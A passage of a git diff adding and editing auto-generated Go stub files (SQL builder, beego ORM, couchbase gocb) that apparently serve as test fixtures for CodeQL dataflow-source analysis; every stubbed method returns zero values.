InsertBuilder { + return InsertBuilder{} +} + +func (_ InsertBuilder) MustSql() (string, []interface{}) { + return "", nil +} + +func (_ InsertBuilder) Options(_ ...string) InsertBuilder { + return InsertBuilder{} +} + +func (_ InsertBuilder) PlaceholderFormat(_ PlaceholderFormat) InsertBuilder { + return InsertBuilder{} +} + +func (_ InsertBuilder) Prefix(_ string, _ ...interface{}) InsertBuilder { + return InsertBuilder{} +} + +func (_ InsertBuilder) PrefixExpr(_ Sqlizer) InsertBuilder { + return InsertBuilder{} +} + +func (_ InsertBuilder) Query() (*sql.Rows, error) { + return nil, nil +} + +func (_ InsertBuilder) QueryContext(_ context.Context) (*sql.Rows, error) { + return nil, nil +} + +func (_ InsertBuilder) QueryRow() RowScanner { + return nil +} + +func (_ InsertBuilder) QueryRowContext(_ context.Context) RowScanner { + return nil +} + +func (_ InsertBuilder) RunWith(_ BaseRunner) InsertBuilder { + return InsertBuilder{} +} + +func (_ InsertBuilder) Scan(_ ...interface{}) error { + return nil +} + +func (_ InsertBuilder) ScanContext(_ context.Context, _ ...interface{}) error { + return nil +} + +func (_ InsertBuilder) Select(_ SelectBuilder) InsertBuilder { + return InsertBuilder{} +} + +func (_ InsertBuilder) SetMap(_ map[string]interface{}) InsertBuilder { + return InsertBuilder{} +} + +func (_ InsertBuilder) Suffix(_ string, _ ...interface{}) InsertBuilder { + return InsertBuilder{} +} + +func (_ InsertBuilder) SuffixExpr(_ Sqlizer) InsertBuilder { + return InsertBuilder{} +} + +func (_ InsertBuilder) ToSql() (string, []interface{}, error) { + return "", nil, nil +} + +func (_ InsertBuilder) Values(_ ...interface{}) InsertBuilder { + return InsertBuilder{} +} + +type PlaceholderFormat interface { + ReplacePlaceholders(_ string) (string, error) +} + +func QueryContextWith(_ context.Context, _ QueryerContext, _ Sqlizer) (*sql.Rows, error) { + return nil, nil +} + +func QueryRowContextWith(_ context.Context, _ QueryRowerContext, _ Sqlizer) RowScanner { + return nil +} + +func QueryRowWith(_ QueryRower, _ Sqlizer) RowScanner { + return nil +} + +type QueryRower interface { + QueryRow(_ string, _ ...interface{}) RowScanner +} + +type QueryRowerContext interface { + QueryRowContext(_ context.Context, _ string, _ ...interface{}) RowScanner +} + +func QueryWith(_ Queryer, _ Sqlizer) (*sql.Rows, error) { + return nil, nil +} + +type Queryer interface { + Query(_ string, _ ...interface{}) (*sql.Rows, error) +} + +type QueryerContext interface { + QueryContext(_ context.Context, _ string, _ ...interface{}) (*sql.Rows, error) +} + +type RowScanner interface { + Scan(_ ...interface{}) error +} + +type SelectBuilder struct{} + +func (_ SelectBuilder) Column(_ interface{}, _ ...interface{}) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) Columns(_ ...string) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) CrossJoin(_ string, _ ...interface{}) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) Distinct() SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) Exec() (sql.Result, error) { + return nil, nil +} + +func (_ SelectBuilder) ExecContext(_ context.Context) (sql.Result, error) { + return nil, nil +} + +func (_ SelectBuilder) From(_ string) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) FromSelect(_ SelectBuilder, _ string) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) GroupBy(_ ...string) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) Having(_ interface{}, _ ...interface{}) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) InnerJoin(_ string, _ ...interface{}) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) Join(_ string, _ ...interface{}) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) JoinClause(_ interface{}, _ ...interface{}) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) LeftJoin(_ string, _ ...interface{}) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) Limit(_ uint64) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) MustSql() (string, []interface{}) { + return "", nil +} + +func (_ SelectBuilder) Offset(_ uint64) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) Options(_ ...string) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) OrderBy(_ ...string) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) OrderByClause(_ interface{}, _ ...interface{}) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) PlaceholderFormat(_ PlaceholderFormat) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) Prefix(_ string, _ ...interface{}) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) PrefixExpr(_ Sqlizer) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) Query() (*sql.Rows, error) { + return nil, nil +} + +func (_ SelectBuilder) QueryContext(_ context.Context) (*sql.Rows, error) { + return nil, nil +} + +func (_ SelectBuilder) QueryRow() RowScanner { + return nil +} + +func (_ SelectBuilder) QueryRowContext(_ context.Context) RowScanner { + return nil +} + +func (_ SelectBuilder) RemoveColumns() SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) RemoveLimit() SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) RemoveOffset() SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) RightJoin(_ string, _ ...interface{}) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) RunWith(_ BaseRunner) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) Scan(_ ...interface{}) error { + return nil +} + +func (_ SelectBuilder) ScanContext(_ context.Context, _ ...interface{}) error { + return nil +} + +func (_ SelectBuilder) Suffix(_ string, _ ...interface{}) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) SuffixExpr(_ Sqlizer) SelectBuilder { + return SelectBuilder{} +} + +func (_ SelectBuilder) ToSql() (string, []interface{}, error) { + return "", nil, nil +} + +func (_ SelectBuilder) Where(_ interface{}, _ ...interface{}) SelectBuilder { + return SelectBuilder{} +} + +type Sqlizer interface { + ToSql() (string, []interface{}, error) +} + +type StdSql interface { + Exec(_ string, _ ...interface{}) (sql.Result, error) + Query(_ string, _ ...interface{}) (*sql.Rows, error) + QueryRow(_ string, _ ...interface{}) *sql.Row +} + +type StdSqlCtx interface { + Exec(_ string, _ ...interface{}) (sql.Result, error) + ExecContext(_ context.Context, _ string, _ ...interface{}) (sql.Result, error) + Query(_ string, _ ...interface{}) (*sql.Rows, error) + QueryContext(_ context.Context, _ string, _ ...interface{}) (*sql.Rows, error) + QueryRow(_ string, _ ...interface{}) *sql.Row + QueryRowContext(_ context.Context, _ string, _ ...interface{}) *sql.Row +} + +type UpdateBuilder struct{} + +func (_ UpdateBuilder) Exec() (sql.Result, error) { + return nil, nil +} + +func (_ UpdateBuilder) ExecContext(_ context.Context) (sql.Result, error) { + return nil, nil +} + +func (_ UpdateBuilder) From(_ string) UpdateBuilder { + return UpdateBuilder{} +} + +func (_ UpdateBuilder) FromSelect(_ SelectBuilder, _ string) UpdateBuilder { + return UpdateBuilder{} +} + +func (_ UpdateBuilder) Limit(_ uint64) UpdateBuilder { + return UpdateBuilder{} +} + +func (_ UpdateBuilder) MustSql() (string, []interface{}) { + return "", nil +} + +func (_ UpdateBuilder) Offset(_ uint64) UpdateBuilder { + return UpdateBuilder{} +} + +func (_ UpdateBuilder) OrderBy(_ ...string) UpdateBuilder { + return UpdateBuilder{} +} + +func (_ UpdateBuilder) PlaceholderFormat(_ PlaceholderFormat) UpdateBuilder { + return UpdateBuilder{} +} + +func (_ UpdateBuilder) Prefix(_ string, _ ...interface{}) UpdateBuilder { + return UpdateBuilder{} +} + +func (_ UpdateBuilder) PrefixExpr(_ Sqlizer) UpdateBuilder { + return UpdateBuilder{} +} + +func (_ UpdateBuilder) Query() (*sql.Rows, error) { + return nil, nil +} + +func (_ UpdateBuilder) QueryContext(_ context.Context) (*sql.Rows, error) { + return nil, nil +} + +func (_ UpdateBuilder) QueryRow() RowScanner { + return nil +} + +func (_ UpdateBuilder) QueryRowContext(_ context.Context) RowScanner { + return nil +} + +func (_ UpdateBuilder) RunWith(_ BaseRunner) UpdateBuilder { + return UpdateBuilder{} +} + +func (_ UpdateBuilder) Scan(_ ...interface{}) error { + return nil +} + +func (_ UpdateBuilder) ScanContext(_ context.Context, _ ...interface{}) error { + return nil +} + +func (_ UpdateBuilder) Set(_ string, _ interface{}) UpdateBuilder { + return UpdateBuilder{} +} + +func (_ UpdateBuilder) SetMap(_ map[string]interface{}) UpdateBuilder { + return UpdateBuilder{} +} + +func (_ UpdateBuilder) Suffix(_ string, _ ...interface{}) UpdateBuilder { + return UpdateBuilder{} +} + +func (_ UpdateBuilder) SuffixExpr(_ Sqlizer) UpdateBuilder { + return UpdateBuilder{} +} + +func (_ UpdateBuilder) Table(_ string) UpdateBuilder { + return UpdateBuilder{} +} + +func (_ UpdateBuilder) ToSql() (string, []interface{}, error) { + return "", nil, nil +} + +func (_ UpdateBuilder) Where(_ interface{}, _ ...interface{}) UpdateBuilder { + return UpdateBuilder{} +} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/beego/beego/v2/client/orm/stub.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/beego/beego/v2/client/orm/stub.go index 4dfcd2aefc85..58000359ed5d 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/beego/beego/v2/client/orm/stub.go +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/beego/beego/v2/client/orm/stub.go @@ -2,7 +2,7 @@ // This is a simple stub for github.com/beego/beego/v2/client/orm, strictly for use in testing. // See the LICENSE file for information about the licensing of the original library. -// Source: github.com/beego/beego/v2/client/orm (exports: DQL,DB,Ormer; functions: NewOrm) +// Source: github.com/beego/beego/v2/client/orm (exports: DB,DQL,Ormer; functions: NewOrm) // Package orm is a stub of github.com/beego/beego/v2/client/orm, generated by depstubber. package orm @@ -56,30 +56,10 @@ func (_ *Condition) OrNotCond(_ *Condition) *Condition { } type DB struct { - RWMutex *sync.RWMutex - DB *sql.DB + *sync.RWMutex + DB *sql.DB } -func (_ DB) Lock() {} - -func (_ DB) RLock() {} - -func (_ DB) RLocker() sync.Locker { - return nil -} - -func (_ DB) RUnlock() {} - -func (_ DB) TryLock() bool { - return false -} - -func (_ DB) TryRLock() bool { - return false -} - -func (_ DB) Unlock() {} - func (_ *DB) Begin() (*sql.Tx, error) { return nil, nil } diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/couchbase/gocb/stub.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/couchbase/gocb/stub.go new file mode 100644 index 000000000000..ba230f183b4f --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/couchbase/gocb/stub.go @@ -0,0 +1,1273 @@ +// Code generated by depstubber. DO NOT EDIT. +// This is a simple stub for github.com/couchbase/gocb, strictly for use in testing. + +// See the LICENSE file for information about the licensing of the original library. +// Source: github.com/couchbase/gocb (exports: Cluster,AnalyticsResults,QueryResults,SearchResults; functions: ) + +// Package gocb is a stub of github.com/couchbase/gocb, generated by depstubber. +package gocb + +import ( + time "time" +) + +type AnalyticsDeferredResultHandle interface { + Close() error + Next(_ interface{}) bool + NextBytes() []byte + One(_ interface{}) error + Status() (string, error) +} + +type AnalyticsIngestOptions struct{} + +func (_ *AnalyticsIngestOptions) AnalyticsTimeout(_ time.Duration) *AnalyticsIngestOptions { + return nil +} + +func (_ *AnalyticsIngestOptions) DataConverter(_ DataConverterFunction) *AnalyticsIngestOptions { + return nil +} + +func (_ *AnalyticsIngestOptions) IdGenerator(_ IdGeneratorFunction) *AnalyticsIngestOptions { + return nil +} + +func (_ *AnalyticsIngestOptions) IgnoreIngestError(_ bool) *AnalyticsIngestOptions { + return nil +} + +func (_ *AnalyticsIngestOptions) IngestMethod(_ interface{}) *AnalyticsIngestOptions { + return nil +} + +func (_ *AnalyticsIngestOptions) KVRetryBehavior(_ QueryRetryBehavior) *AnalyticsIngestOptions { + return nil +} + +func (_ *AnalyticsIngestOptions) KVRetryOn(_ []error) *AnalyticsIngestOptions { + return nil +} + +type AnalyticsQuery struct{} + +func (_ *AnalyticsQuery) ContextId(_ string) *AnalyticsQuery { + return nil +} + +func (_ *AnalyticsQuery) Deferred(_ bool) *AnalyticsQuery { + return nil +} + +func (_ *AnalyticsQuery) Pretty(_ bool) *AnalyticsQuery { + return nil +} + +func (_ *AnalyticsQuery) Priority(_ bool) *AnalyticsQuery { + return nil +} + +func (_ *AnalyticsQuery) RawParam(_ string, _ interface{}) *AnalyticsQuery { + return nil +} + +func (_ *AnalyticsQuery) ServerSideTimeout(_ time.Duration) *AnalyticsQuery { + return nil +} + +type AnalyticsResultMetrics struct { + ElapsedTime time.Duration + ExecutionTime time.Duration + ResultCount uint + ResultSize uint + MutationCount uint + SortCount uint + ErrorCount uint + WarningCount uint + ProcessedObjects uint +} + +type AnalyticsResults interface { + ClientContextId() string + Close() error + Handle() AnalyticsDeferredResultHandle + Metrics() AnalyticsResultMetrics + Next(_ interface{}) bool + NextBytes() []byte + One(_ interface{}) error + RequestId() string + Signature() interface{} + Status() string + Warnings() []AnalyticsWarning +} + +type AnalyticsWarning struct { + Code uint32 + Message string +} + +type AuthCredsRequest struct { + Service ServiceType + Endpoint string + Bucket string +} + +type AuthDomain string + +type Authenticator interface { + Credentials(_ AuthCredsRequest) ([]UserPassPair, error) +} + +type Bucket struct{} + +func (_ *Bucket) AnalyticsIngest(_ *AnalyticsQuery, _ []interface{}, _ *AnalyticsIngestOptions) error { + return nil +} + +func (_ *Bucket) AnalyticsTimeout() time.Duration { + return 0 +} + +func (_ *Bucket) Append(_ string, _ string) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) AppendDura(_ string, _ string, _ uint, _ uint) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) AppendMt(_ string, _ string) (Cas, MutationToken, error) { + return 0, MutationToken{}, nil +} + +func (_ *Bucket) BulkOperationTimeout() time.Duration { + return 0 +} + +func (_ *Bucket) Close() error { + return nil +} + +func (_ *Bucket) Counter(_ string, _ int64, _ int64, _ uint32) (uint64, Cas, error) { + return 0, 0, nil +} + +func (_ *Bucket) CounterDura(_ string, _ int64, _ int64, _ uint32, _ uint, _ uint) (uint64, Cas, error) { + return 0, 0, nil +} + +func (_ *Bucket) CounterMt(_ string, _ int64, _ int64, _ uint32) (uint64, Cas, MutationToken, error) { + return 0, 0, MutationToken{}, nil +} + +func (_ *Bucket) Diagnostics() (*DiagnosticReport, error) { + return nil, nil +} + +func (_ *Bucket) Do(_ []BulkOp) error { + return nil +} + +func (_ *Bucket) DurabilityPollTimeout() time.Duration { + return 0 +} + +func (_ *Bucket) DurabilityTimeout() time.Duration { + return 0 +} + +func (_ *Bucket) ExecuteAnalyticsQuery(_ *AnalyticsQuery, _ interface{}) (AnalyticsResults, error) { + return nil, nil +} + +func (_ *Bucket) ExecuteN1qlQuery(_ *N1qlQuery, _ interface{}) (QueryResults, error) { + return nil, nil +} + +func (_ *Bucket) ExecuteSearchQuery(_ *SearchQuery) (SearchResults, error) { + return nil, nil +} + +func (_ *Bucket) ExecuteSpatialQuery(_ *SpatialQuery) (ViewResults, error) { + return nil, nil +} + +func (_ *Bucket) ExecuteViewQuery(_ *ViewQuery) (ViewResults, error) { + return nil, nil +} + +func (_ *Bucket) Get(_ string, _ interface{}) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) GetAndLock(_ string, _ uint32, _ interface{}) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) GetAndTouch(_ string, _ uint32, _ interface{}) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) GetReplica(_ string, _ interface{}, _ int) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) Insert(_ string, _ interface{}, _ uint32) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) InsertDura(_ string, _ interface{}, _ uint32, _ uint, _ uint) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) InsertMt(_ string, _ interface{}, _ uint32) (Cas, MutationToken, error) { + return 0, MutationToken{}, nil +} + +func (_ *Bucket) Internal() *BucketInternal { + return nil +} + +func (_ *Bucket) InvalidateQueryCache() {} + +func (_ *Bucket) IoRouter() interface{} { + return nil +} + +func (_ *Bucket) ListAppend(_ string, _ interface{}, _ bool) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) ListGet(_ string, _ uint, _ interface{}) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) ListPrepend(_ string, _ interface{}, _ bool) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) ListRemove(_ string, _ uint) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) ListSet(_ string, _ uint, _ interface{}) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) ListSize(_ string) (uint, Cas, error) { + return 0, 0, nil +} + +func (_ *Bucket) LookupIn(_ string) *LookupInBuilder { + return nil +} + +func (_ *Bucket) LookupInEx(_ string, _ SubdocDocFlag) *LookupInBuilder { + return nil +} + +func (_ *Bucket) Manager(_ string, _ string) *BucketManager { + return nil +} + +func (_ *Bucket) MapAdd(_ string, _ string, _ interface{}, _ bool) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) MapGet(_ string, _ string, _ interface{}) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) MapRemove(_ string, _ string) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) MapSize(_ string) (uint, Cas, error) { + return 0, 0, nil +} + +func (_ *Bucket) MutateIn(_ string, _ Cas, _ uint32) *MutateInBuilder { + return nil +} + +func (_ *Bucket) MutateInEx(_ string, _ SubdocDocFlag, _ Cas, _ uint32) *MutateInBuilder { + return nil +} + +func (_ *Bucket) MutateInExDura(_ string, _ SubdocDocFlag, _ Cas, _ uint32, _ uint, _ uint) *MutateInBuilder { + return nil +} + +func (_ *Bucket) N1qlTimeout() time.Duration { + return 0 +} + +func (_ *Bucket) Name() string { + return "" +} + +func (_ *Bucket) OperationTimeout() time.Duration { + return 0 +} + +func (_ *Bucket) Ping(_ []ServiceType) (*PingReport, error) { + return nil, nil +} + +func (_ *Bucket) Prepend(_ string, _ string) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) PrependDura(_ string, _ string, _ uint, _ uint) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) PrependMt(_ string, _ string) (Cas, MutationToken, error) { + return 0, MutationToken{}, nil +} + +func (_ *Bucket) QueuePop(_ string, _ interface{}) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) QueuePush(_ string, _ interface{}, _ bool) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) QueueSize(_ string) (uint, Cas, error) { + return 0, 0, nil +} + +func (_ *Bucket) Remove(_ string, _ Cas) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) RemoveDura(_ string, _ Cas, _ uint, _ uint) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) RemoveMt(_ string, _ Cas) (Cas, MutationToken, error) { + return 0, MutationToken{}, nil +} + +func (_ *Bucket) Replace(_ string, _ interface{}, _ Cas, _ uint32) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) ReplaceDura(_ string, _ interface{}, _ Cas, _ uint32, _ uint, _ uint) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) ReplaceMt(_ string, _ interface{}, _ Cas, _ uint32) (Cas, MutationToken, error) { + return 0, MutationToken{}, nil +} + +func (_ *Bucket) SetAdd(_ string, _ interface{}, _ bool) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) SetAnalyticsQueryRetryBehavior(_ QueryRetryBehavior) {} + +func (_ *Bucket) SetAnalyticsTimeout(_ time.Duration) {} + +func (_ *Bucket) SetBulkOperationTimeout(_ time.Duration) {} + +func (_ *Bucket) SetDurabilityPollTimeout(_ time.Duration) {} + +func (_ *Bucket) SetDurabilityTimeout(_ time.Duration) {} + +func (_ *Bucket) SetExists(_ string, _ interface{}) (bool, Cas, error) { + return false, 0, nil +} + +func (_ *Bucket) SetN1qlTimeout(_ time.Duration) {} + +func (_ *Bucket) SetOperationTimeout(_ time.Duration) {} + +func (_ *Bucket) SetRemove(_ string, _ interface{}) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) SetSearchQueryRetryBehavior(_ QueryRetryBehavior) {} + +func (_ *Bucket) SetSize(_ string) (uint, Cas, error) { + return 0, 0, nil +} + +func (_ *Bucket) SetTranscoder(_ Transcoder) {} + +func (_ *Bucket) SetViewTimeout(_ time.Duration) {} + +func (_ *Bucket) Stats(_ string) (ServerStats, error) { + return nil, nil +} + +func (_ *Bucket) Touch(_ string, _ Cas, _ uint32) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) TouchDura(_ string, _ Cas, _ uint32, _ uint, _ uint) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) UUID() string { + return "" +} + +func (_ *Bucket) Unlock(_ string, _ Cas) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) Upsert(_ string, _ interface{}, _ uint32) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) UpsertDura(_ string, _ interface{}, _ uint32, _ uint, _ uint) (Cas, error) { + return 0, nil +} + +func (_ *Bucket) UpsertMt(_ string, _ interface{}, _ uint32) (Cas, MutationToken, error) { + return 0, MutationToken{}, nil +} + +func (_ *Bucket) ViewTimeout() time.Duration { + return 0 +} + +type BucketInternal struct{} + +func (_ *BucketInternal) GetRandom(_ interface{}) (string, Cas, error) { + return "", 0, nil +} + +func (_ *BucketInternal) RemoveMeta(_ string, _ []byte, _ []byte, _ byte, _ uint32, _ uint32, _ uint32, _ uint64, _ uint64) (Cas, error) { + return 0, nil +} + +func (_ *BucketInternal) UpsertMeta(_ string, _ []byte, _ []byte, _ byte, _ uint32, _ uint32, _ uint32, _ uint64, _ uint64) (Cas, error) { + return 0, nil +} + +type BucketManager struct{} + +func (_ *BucketManager) BuildDeferredIndexes() ([]string, error) { + return nil, nil +} + +func (_ *BucketManager) CreateIndex(_ string, _ []string, _ bool, _ bool) error { + return nil +} + +func (_ *BucketManager) CreatePrimaryIndex(_ string, _ bool, _ bool) error { + return nil +} + +func (_ *BucketManager) DropIndex(_ string, _ bool) error { + return nil +} + +func (_ *BucketManager) DropPrimaryIndex(_ string, _ bool) error { + return nil +} + +func (_ *BucketManager) Flush() error { + return nil +} + +func (_ *BucketManager) GetDesignDocument(_ string) (*DesignDocument, error) { + return nil, nil +} + +func (_ *BucketManager) GetDesignDocuments() ([]*DesignDocument, error) { + return nil, nil +} + +func (_ *BucketManager) GetIndexes() ([]IndexInfo, error) { + return nil, nil +} + +func (_ *BucketManager) InsertDesignDocument(_ *DesignDocument) error { + return nil +} + +func (_ *BucketManager) RemoveDesignDocument(_ string) error { + return nil +} + +func (_ *BucketManager) UpsertDesignDocument(_ *DesignDocument) error { + return nil +} + +func (_ *BucketManager) WatchIndexes(_ []string, _ bool, _ time.Duration) error { + return nil +} + +type BucketSettings struct { + FlushEnabled bool + IndexReplicas bool + Name string + Password string + Quota int + Replicas int + Type BucketType +} + +type BucketType int + +type BulkOp interface{} + +type Cas uint64 + +type Cluster struct{} + +func (_ *Cluster) AnalyticsTimeout() time.Duration { + return 0 +} + +func (_ *Cluster) Authenticate(_ Authenticator) error { + return nil +} + +func (_ *Cluster) Close() error { + return nil +} + +func (_ *Cluster) ConnectTimeout() time.Duration { + return 0 +} + +func (_ *Cluster) EnhancedErrors() bool { + return false +} + +func (_ *Cluster) ExecuteAnalyticsQuery(_ *AnalyticsQuery, _ interface{}) (AnalyticsResults, error) { + return nil, nil +} + +func (_ *Cluster) ExecuteN1qlQuery(_ *N1qlQuery, _ interface{}) (QueryResults, error) { + return nil, nil +} + +func (_ *Cluster) ExecuteSearchQuery(_ *SearchQuery) (SearchResults, error) { + return nil, nil +} + +func (_ *Cluster) FtsTimeout() time.Duration { + return 0 +} + +func (_ *Cluster) InvalidateQueryCache() {} + +func (_ *Cluster) Manager(_ string, _ string) *ClusterManager { + return nil +} + +func (_ *Cluster) N1qlTimeout() time.Duration { + return 0 +} + +func (_ *Cluster) NmvRetryDelay() time.Duration { + return 0 +} + +func (_ *Cluster) OpenBucket(_ string, _ string) (*Bucket, error) { + return nil, nil +} + +func (_ *Cluster) OpenBucketWithMt(_ string, _ string) (*Bucket, error) { + return nil, nil +} + +func (_ *Cluster) OpenStreamingBucket(_ string, _ string, _ string) (*StreamingBucket, error) { + return nil, nil +} + +func (_ *Cluster) ServerConnectTimeout() time.Duration { + return 0 +} + +func (_ *Cluster) SetAnalyticsTimeout(_ time.Duration) {} + +func (_ *Cluster) SetConnectTimeout(_ time.Duration) {} + +func (_ *Cluster) SetEnhancedErrors(_ bool) {} + +func (_ *Cluster) SetFtsTimeout(_ time.Duration) {} + +func (_ *Cluster) SetN1qlTimeout(_ time.Duration) {} + +func (_ *Cluster) SetNmvRetryDelay(_ time.Duration) {} + +func (_ *Cluster) SetServerConnectTimeout(_ time.Duration) {} + +func (_ *Cluster) SetTracer(_ interface{}) {} + +type ClusterManager struct{} + +func (_ *ClusterManager) GetBuckets() ([]*BucketSettings, error) { + return nil, nil +} + +func (_ *ClusterManager) GetUser(_ AuthDomain, _ string) (*User, error) { + return nil, nil +} + +func (_ *ClusterManager) GetUsers(_ AuthDomain) ([]*User, error) { + return nil, nil +} + +func (_ *ClusterManager) InsertBucket(_ *BucketSettings) error { + return nil +} + +func (_ *ClusterManager) Internal() *ClusterManagerInternal { + return nil +} + +func (_ *ClusterManager) RemoveBucket(_ string) error { + return nil +} + +func (_ *ClusterManager) RemoveUser(_ AuthDomain, _ string) error { + return nil +} + +func (_ *ClusterManager) SearchIndexManager() *SearchIndexManager { + return nil +} + +func (_ *ClusterManager) UpdateBucket(_ *BucketSettings) error { + return nil +} + +func (_ *ClusterManager) UpsertUser(_ AuthDomain, _ string, _ *UserSettings) error { + return nil +} + +type ClusterManagerInternal struct{} + +func (_ *ClusterManagerInternal) GetNodesMetadata() ([]NodeMetadata, error) { + return nil, nil +} + +type ConsistencyMode int + +type DataConverterFunction func([]byte) (interface{}, error) + +type DesignDocument struct { + Name string + Views map[string]View + SpatialViews map[string]View +} + +type DiagConnState int + +type DiagnosticEntry struct { + Service ServiceType + State DiagConnState + LocalAddr string + RemoteAddr string + LastActivity time.Time +} + +type DiagnosticReport struct { + ConfigRev int64 + Services []DiagnosticEntry +} + +func (_ *DiagnosticReport) MarshalJSON() ([]byte, error) { + return nil, nil +} + +type DocumentFragment struct{} + +func (_ *DocumentFragment) Cas() Cas { + return 0 +} + +func (_ *DocumentFragment) Content(_ string, _ interface{}) error { + return nil +} + +func (_ *DocumentFragment) ContentByIndex(_ int, _ interface{}) error { + return nil +} + +func (_ *DocumentFragment) Exists(_ string) bool { + return false +} + +func (_ *DocumentFragment) MutationToken() MutationToken { + return MutationToken{} +} + +type IdGeneratorFunction func(interface{}) (string, error) + +type IndexInfo struct { + Name string + IsPrimary bool + Type IndexType + State string + Keyspace string + Namespace string + IndexKey []string +} + +type IndexType string + +type LookupInBuilder struct{} + +func (_ *LookupInBuilder) Execute() (*DocumentFragment, error) { + return nil, nil +} + +func (_ *LookupInBuilder) Exists(_ string) *LookupInBuilder { + return nil +} + +func (_ *LookupInBuilder) ExistsEx(_ string, _ SubdocFlag) *LookupInBuilder { + return nil +} + +func (_ *LookupInBuilder) Get(_ string) *LookupInBuilder { + return nil +} + +func (_ *LookupInBuilder) GetCount(_ string) *LookupInBuilder { + return nil +} + +func (_ *LookupInBuilder) GetCountEx(_ string, _ SubdocFlag) *LookupInBuilder { + return nil +} + +func (_ *LookupInBuilder) GetEx(_ string, _ SubdocFlag) *LookupInBuilder { + return nil +} + +type MutateInBuilder struct{} + +func (_ *MutateInBuilder) ArrayAddUnique(_ string, _ interface{}, _ bool) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) ArrayAddUniqueEx(_ string, _ interface{}, _ SubdocFlag) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) ArrayAppend(_ string, _ interface{}, _ bool) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) ArrayAppendEx(_ string, _ interface{}, _ SubdocFlag) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) ArrayAppendMulti(_ string, _ interface{}, _ bool) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) ArrayAppendMultiEx(_ string, _ interface{}, _ SubdocFlag) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) ArrayInsert(_ string, _ interface{}) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) ArrayInsertEx(_ string, _ interface{}, _ SubdocFlag) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) ArrayInsertMulti(_ string, _ interface{}) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) ArrayInsertMultiEx(_ string, _ interface{}, _ SubdocFlag) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) ArrayPrepend(_ string, _ interface{}, _ bool) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) ArrayPrependEx(_ string, _ interface{}, _ SubdocFlag) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) ArrayPrependMulti(_ string, _ interface{}, _ bool) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) ArrayPrependMultiEx(_ string, _ interface{}, _ SubdocFlag) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) Counter(_ string, _ int64, 